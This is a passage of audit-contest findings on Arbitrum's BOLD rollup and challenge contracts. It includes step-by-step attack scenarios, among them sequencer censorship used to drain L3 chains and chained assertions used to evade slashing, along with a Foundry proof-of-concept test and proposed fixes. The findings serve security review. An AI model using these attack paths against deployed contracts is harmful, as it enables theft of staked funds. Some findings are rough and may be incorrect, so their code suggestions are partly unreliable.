    assertTrue(ei.challengeManager.getEdge(edge1Id).status == EdgeStatus.Confirmed, "Edge confirmed");

    return (ei, edge1Id);
}

Tools Used

manual view

Recommended Mitigation Steps

when rivals are born , there is no reason back to UNRIVALED again . So
when rivals are born ,update unrivaled time and doesn't count for that UNRIVALED time anymore .

Assessed type

Context

`newStakeOnNewAssertion(...)` will revert due wrong logic implementation in `RollupUserLogic` contract

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L210-L216
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L331-L342
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L366-L368
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/AssertionStakingPool.sol#L40-L46

Vulnerability details

Impact

Users will not be able to create assertions leading to a DOS on a core functionality of the protocol.

Proof of Concept

Note that the IRollupUser is not deployed with funds deposited in it.

User’s create an assertion using the AssertionStakingPool::createAssertion(...) function, at a high level the order of execution is as shown below

L0 -> AssertionStakingPool::createAssertion(...)
L1 --> IERC20(stakeToken).safeIncreaseAllowance(rollup, ...)
L2 --> IRollupUser(rollup)::newStakeOnNewAssertion(...)
L3 ---> RollupUserLogic::newStakeOnNewAssertion(...)
...
L4 ----> RollupUserLogic::stakeOnNewAssertion(...)
....
L5 -----> IERC20(stakeToken).safeTransfer(loserStakeEscrow, .requiredStake) 
L6 --> receiveTokens(tokenAmount);
L7 ---> IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), tokenAmount) 

I have marked the portions of interest (as L1, L2, L5 and L7) in this high level trace. Lets go over the important steps

  • L1 - the creator of the assertion gives the rollup contract allowance (1) to spend it’s stake in order to create the assertion
  • L2 the rollup contract starts the creation of the assertion
  • L5 the rollup contract transfers an equivalent of the users stake amount to the loserStakeEscrow contract from it’s own stakeToken balance (at this point its balance may be less than the requiredStake
  • L7 the rollup contract collects the users stake from the user

However, when there are no fund in the rollup contract, the AssertionStakingPool::createAssertion(...) call will revert at L5 because in the current implementation, the order of execution requires that the rollup contract transfer funds to the loserStakeEscrow before actually receiving the funds from the user who is creating the assertion.

File: AssertionStakingPool.sol
40:     function createAssertion(AssertionInputs calldata assertionInputs) external {
41:         uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
42:         // approve spending from rollup for newStakeOnNewAssertion call
43:         IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
44:         // reverts if pool doesn't have enough stake and if assertion has already been asserted
45:         IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
46:     }

File: RollupUserLogic.sol
331:     function newStakeOnNewAssertion(
332:         uint256 tokenAmount,
333:         AssertionInputs calldata assertion,
334:         bytes32 expectedAssertionHash,
335:         address withdrawalAddress
336:     ) public {
337:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
338:         _newStake(tokenAmount, withdrawalAddress);
339:         stakeOnNewAssertion(assertion, expectedAssertionHash);
340:         /// @dev This is an external call, safe because it's at the end of the function
341:         receiveTokens(tokenAmount);
342:     }
...

163:     function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
164:         public
165:         onlyValidator
166:         whenNotPaused
167:     {
...
210:         if (!getAssertionStorage(newAssertionHash).isFirstChild) {
216:             // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
217:             // only 1 of the children can be confirmed and get their stake refunded
218:             // so we send the other children's stake to the loserStakeEscrow
219:             // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
220:  @>         IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
221:         }
...

366:     function receiveTokens(uint256 tokenAmount) private {
361:  @>     IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), tokenAmount);
362:     }

Poc Summary

  • current stakeToken balance of the rollup contract is zero or less than requiredStake
  • Alice calls AssertionStakingPool::createAssertion(...) to create a new assertion
  • rollup tries to lock Alice requiredStake but the function reverts because the rollup does not have up to the current requiredStake amount of the stakeToken
  • Alice assertion could not be created because the call reverts.

Tools Used

Manual review

Recommended Mitigation Steps

Modify the RollupUserLogic::newStakeOnNewAssertion(...) function as shown below

File: RollupUserLogic.sol
331:     function newStakeOnNewAssertion(
332:         uint256 tokenAmount,
333:         AssertionInputs calldata assertion,
334:         bytes32 expectedAssertionHash,
335:         address withdrawalAddress
336:     ) public {
337:         require(withdrawalAddress != address(0), "EMPTY_WITHDRAWAL_ADDRESS");
338:         _newStake(tokenAmount, withdrawalAddress);

339: -       stakeOnNewAssertion(assertion, expectedAssertionHash);
340: -       /// @dev This is an external call, safe because it's at the end of the function
341: -       receiveTokens(tokenAmount);

339: +       receiveTokens(tokenAmount);
340: +       /// @dev This is an external call, safe because it's at the end of the function
341: +       stakeOnNewAssertion(assertion, expectedAssertionHash);

342:     }

The rollup should move the funds from the user’s account before it calls stakeOnNewAssertion(...).

Assessed type

DoS

L2 sequencer can exploit L3 chains using force inclusion delays

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/bridge/SequencerInbox.sol#L314
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/ChallengeEdgeLib.sol#L250-L251

Vulnerability details

Cause

The BOLD dispute protocol requires multiple turn-based steps. When deployed on L2 for enabling the L3 use-case, the L2 sequencer can exploit the L3. It can do that by censoring honest validators dispute moves and forcing them to use the L1 force inclusion mechanism. This allows the sequencer to attack or collude with an attacker to create invalid assertions for L3 chains settling to L2. By causing honest L3 validators to use the L1 force inclusion mechanism, the transactions will be included on L2 via L1 with a delay of up to 24 hours for each turn. As the dispute requires many tens of turns (around 50) to complete, these accumulated delays will cause the honest validators to lose.

Impact

The sequencer can submit arbitrary withdrawals and drain any L3 deployed on L2. While generally the sequencer should not be able to cause any safety violations for the sequenced chain, in this case, they can use their limited censorship ability to violate the safety of any L3 by preventing the timely progress of its dispute games.

The dispute requires around 50 turn-based steps from an honest participant, each delayed by possibly up to 24 hours. Because each participant is limited to a 7-day chess clock, honest participants can be forced to lose due to the L1 inclusion delays. This allows the attacker to be able to confirm an arbitrary assertion and prove arbitrary withdrawals from all L3 chains using BOLD on L2.

Notably, even if the maximum or average delay can be reduced, with 50 turn based steps, even if it's shortened to only 4 hours, the 7 day clock will be exhausted by the delays alone. Moreover, even if the average delay can be reduced to even 2 hours, this will leave the honest validators much less time than needed to reliably guarantee the safety of the chain according to the assumptions of the protocol.

L3s BOLD deployments are in scope

While this only is relevant for L3s using BOLD on L2s (Arbitrum itself), and not for L2s using BOLD on L1, the scope of this contest clearly includes the L3 use case:

Q: For an L3 Orbit chain, secured using BOLD, that settles to Arbitrum One, does the one-step proof happen on Arbitrum One?
A: Yes

Participant: "And it will be work work layer 3 on arbitrum as well that want a implement the bold mechanism"
Sponsor: "yeah that's right"

Severity

Because the sequencer is not trusted with safety with L3s, and is not trusted within the scope of fault proofs, the severity is high. This is not only true due to the trust guarantees, but also due to the intention to decentralize the sequencer role. The loss of funds and trust in the system would be catastrophic, due to the total loss of funds that the L2 sequencer operator is capable of inflicting upon the L3s.

Proof of Concept

As can be seen in the testCanConfirmByOneStep test which runs a challenge from start to finish, if a dishonest assertion is made, the honest validator must complete the full dispute.

  • The full dispute involves 6 levels: block level, then 4 intermediate levels, and a final SmallStep level. Additionally, a final confirmEdgeByOneStepProof must be called to prove the final small step single instruction on-chain to prevent the dishonest edge from being confirmed by time and its assertion being confirmed. This amounts to 6 levels and 1 additional call.

  • For each level, multiple interactions are needed, each can only be done after the opponent's move: createLayerZeroEdge to dispute the claim, and then several bisectEdge calls. Crucially, bisectEdge calls are done in turns because each bisected edge has to be "rivaled" before being further bisected until an edge of length one is reached for that level. Thus, it's not possible for the honest challenger to fully bisect their claim ahead of time (in a single L1 "move"). They must take turns with the attacker because they need to target the attacker's last move in their response (these calls must be done in turns). However, while the attacker has no delay, the honest move is delayed every time by having to go through L1 and the long force inclusion delay.

  • Because all progress is made by taking turns bisecting a 2^43 space of disagreements, it's easy to see that the number of turns is around 43 turn-based moves (as each bisection divides the space into two parts). In addition to this, the calls for createLayerZeroEdge for each level, and the final call to confirmEdgeByOneStepProof need to be included, for up to 50 turn-based actions.

  • For example, for the smaller config used in the tests (3 intermediate levels and 6 bisections in each level), 31 turn-by-turn moves are made by each opponent.

  • Clearly, 50 moves (or even the test config's 31 moves), each delayed by up to 24 hours, very quickly causes the honest challengers to "time out" and exhaust their 7-day clock (from the time of the first move).

Here's a step-by-step scenario for the attack described in the submission:

  1. An L3 chain, called OrbitChain using the BOLD dispute protocol is deployed on Arbitrum (L2).
  2. A malicious L2 (Arbitrum) sequencer operator decides to use its temporary sequencing censorship privileges to create an invalid assertion for the L3 chain.
  3. The attacker submits the invalid assertion to the L2 Rollup chain as an assertion - newStakeOnNewAssertion.
  4. Honest L3 validators recognize the assertion as invalid and attempt to initiate a dispute by calling createLayerZeroEdge to challenge the claim.
  5. The malicious L2 sequencer censors the honest validators' L2 transactions, forcing them to use the L1 force inclusion mechanism to include their transactions on L2. The transactions are included with a significant delay due to the design of the force inclusion delay mechanism. During the delay the attacker's is unrivaled and gains "unrivaled" time.
  6. The attacker responds to the honest validators' dispute without any delay, as their transactions are not censored by the sequencer.
  7. For each level of the dispute (block level, intermediate levels, and SmallStep level), the honest validators and the attacker take turns calling bisectEdge to narrow down the disagreement space.
  8. Due to the L1 force inclusion delay of up to 24 hours for each turn, the honest validators' moves are significantly delayed, while the attacker can respond immediately. During the delay the attacker's is unrivaled and gains "unrivaled" time.
  9. As the dispute progresses through the levels, requiring around 50 turn-based steps, the accumulated delays from the L1 force inclusion mechanism cause the honest validators to exhaust their 7-day chess clock by allowing the attacker to accumulate 7 days of "unrivaled" time.
  10. The honest validators are unable to complete the dispute within the time limit, allowing the attacker's invalid assertion to be confirmed.
  11. The attacker calls confirmEdgeByTime to finish the dispute, and calls confirmAssertion to prove its assertion.
  12. As a result, the invalid assertion is confirmed and added as a root into the outbox, enabling the attacker to submit arbitrary withdrawals and drain funds from the L3 chain.

Tools Used

Manual review.

Recommended Mitigation Steps

The chess-clock and the force-inclusion delay are inherently incompatible with such a long turn-based game if played on L2. In its current highly-interactive form, the application of BOLD should be limited to deployments on L1 (for use in validation of L2s) only, and not for L3s.

Alternatively, two improvements can be made to make the attack less impactful:

  1. Reduce the number of turns to a very small number. This can be done by having each move post all of the data required to challenge any of its components. For example, the levels can be divided into 4 levels such that each level has 2^11 sub-levels (sub-edges) and a call createLayerZeroEdge contains all 2^11 sub levels (how this can be possible is detailed below). This way there are only 2 "turns":
    1. Attacker: createLayerZeroEdge on first level (e.g., level 1) with 2048 sub-levels already detailed on-chain.
    2. Defender: challenge the speciic sub-level - on level 2 already, via createLayerZeroEdge on second level, with all 2048 sub-levels included on-chain.
    3. Attacker: level 3, with all data required for level 4 counter.
    4. Defender: level 4, with all specific instructions.
    5. Attacker: invoke OSP and settle dispute, or wait to lose on time.
  2. Reduce the force inclusion delay to a smaller duration, for example 6 hours.

The combination of these two factors reduce the number of turn-based moves the challenger (defender) needs to make to only 2. If each of those moves is delayed by 6 hours of the force inclusion delay, only 12 hours of the 7 days' clock is lost to the attack, allowing the dispute to proceed with manageable impact.

Posting the required sub-level data would be more expensive for each transaction, but it also reduces the overall amount of transactions and complexity. Additionally on L1, data blobs can be used for this need to make this cheaper. On L2 calldata will be used, which will be posted to L1 blobs, which also make the costs manageable.

In order to store this data on-chain, instead of storing the full data, a merkle root can be calculated and stored from the input data (on-chain). Although merkelization of 2048 would need to be executed on-chain it would be manageable (roughly 4096 hashes) costing around 200K gas. Any subsequent player would be able to construct a proof for any element into the tree from the previously posted data.

Assessed type

Other

Upgrades to EdgeChallengeManager could `DoS the assertion chain` temporarily until admin unstuck it by forcing assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L115-L128

Vulnerability details

Description

EdgeChallengeManager (a.k.a. ECM) can be upgraded during the life cycle of a rollup and this is officialized by an Admin calling RollupAdminLogic::setChallengeManager.

Let say we have the following assertion chain setup, so 3 assertions successfully confirmed, but then the 4th one, we have a divergence, and only the assertion winning the challenge will be able to be confirmed.

                  /--- D(ECM1) - bad
     A --- B --- C    
     |     |     |\--- E(ECM2) - winner (edge confirmed)
    ECM1  ECM1  ECM1 

The problem arise with the following code from RollupUserLogic::confirmAssertion, the implementation assume that the ECM instance to retrieve the winningEdge information is the same as the previous assertion, but as you can see in my setup that is not guaranteed. So while indeed the assertion E is the winner (edge confirmed, but in ECM2 instance, not ECM1), the code here will not find the edge information and will always revert, so the assertion chain will be stuck. The team will be able to resolve the problem by pausing the rollup and calling RollupAdminLogic::forceConfirmAssertion. This seems unexpected and seem to warrant Medium severity.

        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);     //<----- THIS: reading the ECM from prevConfig
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Impacts

Assertion chain temporarily stuck if an assertion divergence arise while an ECM upgrade had just happened and the winner is against the new ECM instance (while the previous assertion is against the old ECM instance)

Proof of Concept

I will demostrate the setup described initially. We have 3 actors in play: Admin, Honest and Evil validator.

  1. Admin deploy the Rollup and ECM contracts. Everything run smootly for days.
  2. Evil validator submit assertion D.
  3. Admin decides to upgrade the contract changing the staking requirement, which require a full upgrade and call setChallengeManager.
  4. Honest validator submit assertion E.
  5. Both assertion D and E are challenged, E wins the battle and his edge is confirmed (in the new ECM instance).
  6. Honest validator call confirmAssertion but that will revert because of require(winningEdge.claimId == assertionHash, "NOT_WINNER");, as the winner edge will not be found in the previous ECM storage.

Recommended Mitigation Steps

Add a fallback to the current ECM in case the edge is not found from the previous assertion ECM.

        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
+           if (winningEdge.claimId == byte32(0)) {
+               winningEdge = challengeManager.getEdge(winningEdgeId);
+           }
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Assessed type

Upgradable

The time spent paused is incremented in the rollup's timing for assertion validation.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L145
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L110

Vulnerability details

Impact

    /**
     * @notice Pause interaction with the rollup contract.
     * The time spent paused is not incremented in the rollup's timing for assertion validation.
     * @dev this function may be frontrun by a validator (ie to create a assertion before the system is paused).
     * The pause should be called atomically with required checks to be sure the system is paused in a consistent state.
     * The RollupAdmin may execute a check against the Rollup's latest assertion num or the OldChallengeManager, then execute this function atomically with it.
     */
    function pause() external override {
        _pause();
        emit OwnerFunctionCalled(3);
    }

According to the comment, the time spent paused should not be incremented in the rollup's timing for assertion validation. However, the rollup's timing does not take paused time into consideration in reality. As a result, adversary can censor transactions (within the censorship budget) and force incorrect assertion to be confirmed.

Proof of Concept

According to the contest doc

We assume that an adversary can censor transactions for at most 1 challengePeriodBlocks or confirmPeriodBlock (whichever is smaller)

Suppose challengePeriodBlocks and confirmPeriodBlock are both 7 days. The steps are as following:

  1. Adversary make an invalid assertion to the latest confirmed assertion, and censor all other txs that submit assertion for 2 days.(Day 0 - Day 1)
  2. Admin pauses the rollup to counteract the situation for 2 days.(Day 2 - Day 3)
  3. Admin realizes pausing doesn't help, and unpauses.
  4. Adversary continues to censor all txs that submit assertion for 4 days.(Day 4 - Day 7)
  5. Adversary confirms this incorrect assertion.

Since no one can make new assertions when the contract is paused, the adversary only needs to spend 6 days of censorship budget (to confirm an incorrect assertion) in this case.

require(block.number >= assertion.createdAtBlock + prevConfig.confirmPeriodBlocks, "BEFORE_DEADLINE");
As this line suggests, no special care for paused time is taken.

Tools Used

Manual

Recommended Mitigation Steps

Make sure the time spent paused is not incremented in the rollup's timing for assertion validation.

Assessed type

Context

Remaining stakers not Refunded

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L344-L359

Vulnerability details

Impact

Although it is stated that not more than 50 stakers are expected, this remains a projection. Therefore if there exists more than 50 stakers, these stakers would be stuck on the older rollup.

Their funds would also be permanently stuck on the old rollup contract.

Proof of Concept

      uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }

        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);

            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

Tools Used

Manual Review, Josephdara

Recommended Mitigation Steps

Implement a function to complete refunds, or transfer the ownership of the old rollup contract to a new address after upgrade to allow for manual forceRefund calls.

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Lack of input validation in edge pool allows malicious user to create a clearly invalid insertion to make staker lose fund.

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/EdgeStakingPool.sol#L44

Vulnerability details

Impact

Lack of input validation in edge pool allows malicious user to create a clearly invalid insertion to make staker lose fund.

Proof of Concept

anyone can create an edge pool with edge id

  constructor(
        address _challengeManager,
        bytes32 _edgeId
    ) AbsBoldStakingPool(address(EdgeChallengeManager(_challengeManager).stakeToken())) {
        challengeManager = _challengeManager;
        edgeId = _edgeId;
    }

then after there are enough user stake fund, an edge can be created.

 function createEdge(CreateEdgeArgs calldata args) external {
        uint256 requiredStake = EdgeChallengeManager(challengeManager).stakeAmounts(args.level);
        IERC20(stakeToken).safeIncreaseAllowance(address(challengeManager), requiredStake);
        bytes32 newEdgeId = EdgeChallengeManager(challengeManager).createLayerZeroEdge(args);
        if (newEdgeId != edgeId) {
            revert IncorrectEdgeId(newEdgeId, edgeId);
        }
    }

the function takes arbitrary CreateEdgeArgs input:

/// @notice Data for creating a layer zero edge
struct CreateEdgeArgs {
    /// @notice The level of edge to be created. Challenges are decomposed into multiple levels.
    ///         The first (level 0) being of type Block, followed by n (set by NUM_BIGSTEP_LEVEL) levels of type BigStep, and finally
    ///         followed by a single level of type SmallStep. Each level is bisected until an edge
    ///         of length one is reached before proceeding to the next level. The first edge in each level (the layer zero edge)
    ///         makes a claim about an assertion or assertion in the lower level.
    ///         Finally in the last level, a SmallStep edge is added that claims a lower level length one BigStep edge, and these
    ///         SmallStep edges are bisected until they reach length one. A length one small step edge
    ///         can then be directly executed using a one-step proof.
    uint8 level;
    /// @notice The end history root of the edge to be created
    bytes32 endHistoryRoot;
    /// @notice The end height of the edge to be created.
    /// @dev    End height is deterministic for different levels but supplying it here gives the
    ///         caller a bit of extra security that they are supplying data for the correct level of edge
    uint256 endHeight;
    /// @notice The edge, or assertion, that is being claimed correct by the newly created edge.
    bytes32 claimId;
    /// @notice Proof that the start history root commits to a prefix of the states that
    ///         end history root commits to
    bytes prefixProof;
    /// @notice Edge type specific data
    ///         For Block type edges this is the abi encoding of:
    ///         bytes32[]: Inclusion proof - proof to show that the end state is the last state in the end history root
    ///         AssertionStateData: the before state of the edge
    ///         AssertionStateData: the after state of the edge
    ///         bytes32 predecessorId: id of the prev assertion
    ///         bytes32 inboxAcc:  the inbox accumulator of the assertion
    ///         For BigStep and SmallStep edges this is the abi encoding of:
    ///         bytes32: Start state - first state the edge commits to
    ///         bytes32: End state - last state the edge commits to
    ///         bytes32[]: Claim start inclusion proof - proof to show the start state is the first state in the claim edge
    ///         bytes32[]: Claim end inclusion proof - proof to show the end state is the last state in the claim edge
    ///         bytes32[]: Inclusion proof - proof to show that the end state is the last state in the end history root
    bytes proof;
}

there is lack of input validation

note, when create layerzero edge, the parameter claimId is not sufficiently validated:

  function createLayerZeroEdge(
        EdgeStore storage store,
        CreateEdgeArgs calldata args,
        AssertionReferenceData memory ard,
        IOneStepProofEntry oneStepProofEntry,
        uint256 expectedEndHeight,
        uint8 numBigStepLevel,
        bool whitelistEnabled
    ) internal returns (EdgeAddedData memory) {
        // each edge type requires some specific checks
        (ProofData memory proofData, bytes32 originId) =
            layerZeroTypeSpecificChecks(store, args, ard, oneStepProofEntry, numBigStepLevel);
        // all edge types share some common checks
        (bytes32 startHistoryRoot) = layerZeroCommonChecks(proofData, args, expectedEndHeight);
        // we only wrap the struct creation in a function as doing so with exceeds the stack limit
        ChallengeEdge memory ce = toLayerZeroEdge(originId, startHistoryRoot, args);

this is calling:

layerZeroTypeSpecificChecks

basically if the levelToType is EdgeType.block, the claimId needs equal to a a pending and has sibling assertion references.

// if the assertion is already confirmed or rejected then it cant be referenced as a claim
if (!ard.isPending) {
    revert AssertionNotPending();
}

// if the claim doesnt have a sibling then it is undisputed, there's no need
// to open challenge edges for it
if (!ard.hasSibling) {
    revert AssertionNoSibling();
}

if a user knows that the pending assertion will be rejected, he will use that assertion to create an edge to make sure the edge is not confirmed as well.

if the levelToType is not EdgeType.block, the code requies the claimEdge is in pending status as well:

// hasLengthOneRival checks existance, so we can use getNoCheck
ChallengeEdge storage claimEdge = getNoCheck(store, args.claimId);

// origin id is the mutual id of the claim
// all rivals and their children share the same origin id - it is a link to the information
// they agree on
bytes32 originId = claimEdge.mutualId();

// once a claim is confirmed it's status can never become pending again, so there is no point
// opening a challenge that references it
if (claimEdge.status != EdgeStatus.Pending) {
    revert ClaimEdgeNotPending();
}

a invalid pending edge will not be confirmed,

if a user knows that the running edge will be rejected, he will use that edge id (claim id) to create an edge to make sure the edge is not confirmed as well.

Tools Used

Manual Review

Recommended Mitigation Steps

add add control to createEdge functoin

or when the edge staking pool is deployed, set the parameter in the constructor

CreateEdgeArgs calldata args

so the staker can research and make sure the args is valid and the the staker can stake fund.

Assessed type

Invalid Validation

A malicious validator can avoid loss his money doing bad assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L572

Vulnerability details

Validator can unstake if their assertions is the last confirmed (see the the first arrow below) or his assertion has already a first child(see arrow below):

function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed(); <----
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0; <----
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

[Link]

Other point to understand the vulnerability is that validators can create a new assertion with non confirmed parents assertions(a parent is the past assertion). with that been said An attacker can control 2 validators and do the next steps:

  1. stake in a bad assertion with his validator number 1 (he has to call newStakeOnNewAssertion).
  2. stake on new assertion with a parent create in the step 1 with validator 2.
  3. with validator 1 call returnOldDeposit since the assertion of the validator number 1 has already a child he can withdraw.
  4. with validator 1 create a assertion with a parent assertion of the step 2.
  5. at this point validator 2 can call returnOldDeposit and withdraw his money.

an attacker can keep doing this indefinitely leading to some problems:

  function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        public
        onlyValidator
        whenNotPaused
    {
        ...

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake); <------
        }
    }

[Link]

Each time that a assertion is created a amount equivalent to the requiredStake is been sent it to the loserStakeEscrow, successfully letting without funds the rollup contract.

Impact

This vulnerability has different impacts:

  1. The rollup contract can be drained. (if there is a way to recover the funds in the loserStakeEscrow, it still a problem since an attacker can uses this to Dos withdrawals to honest validators).
  2. A malicious validator can not be slashed (but he can not withdraw either).
  3. Honest validator has work more and the malicious validator is not been actually punished

Proof of Concept

Run the next proof of concept in file:/test/Rollup.t.sol

function testSuccessCreateSecondAssertionUnstake() public {
        (bytes32 prevHash, AssertionState memory beforeState, uint64 prevInboxCount) = testSuccessCreateAssertion(); // create first assertion validator 1

        AssertionState memory afterState; // set up second assertion
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = prevInboxCount;
        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(1); // 1 because we moved the position within message
        bytes32 expectedAssertionHash2 =
            RollupLib.assertionHash({parentAssertionHash: prevHash, afterState: afterState, inboxAcc: inboxAcc});
        bytes32 prevInboxAcc = userRollup.bridge().sequencerInboxAccs(0);
        vm.roll(block.number + 75);
        vm.prank(validator2); // validator 2 make a new assertion 
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash2,
            withdrawalAddress: validator2Withdrawal
        });

       
        vm.prank(validator1); //validator 1 withdraw
        userRollup.returnOldDeposit();
    }

The point of the proof of concept is demonstrate that validators can unstake no matter if his assertion is not confirmed but yes if it has a child. if the assertion is invalid they already unstake and can trick the protocol as i writed in the description.

Tools Used

Manual, foundry

Recommended Mitigation Steps

Consider don't allow validator to withdraw his stake until his assertion have been confirmed.

Assessed type

Other

Edge from dishonest challenge edge tree can inherit timer from honest tree allowing confirmation of incorrect assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L505-L508
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

Vulnerability details

Impact

Timers can be inherited across different challenge trees and consequently incorrect assertions can be confirmed.

Proof of Concept

The function RollupUserLogic::updateTimerCacheByClaim allows inheritance of timers between different levels of a challenge. It performs some validation on edge being inherited from in checkClaimIdLink (the claiming edge).
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

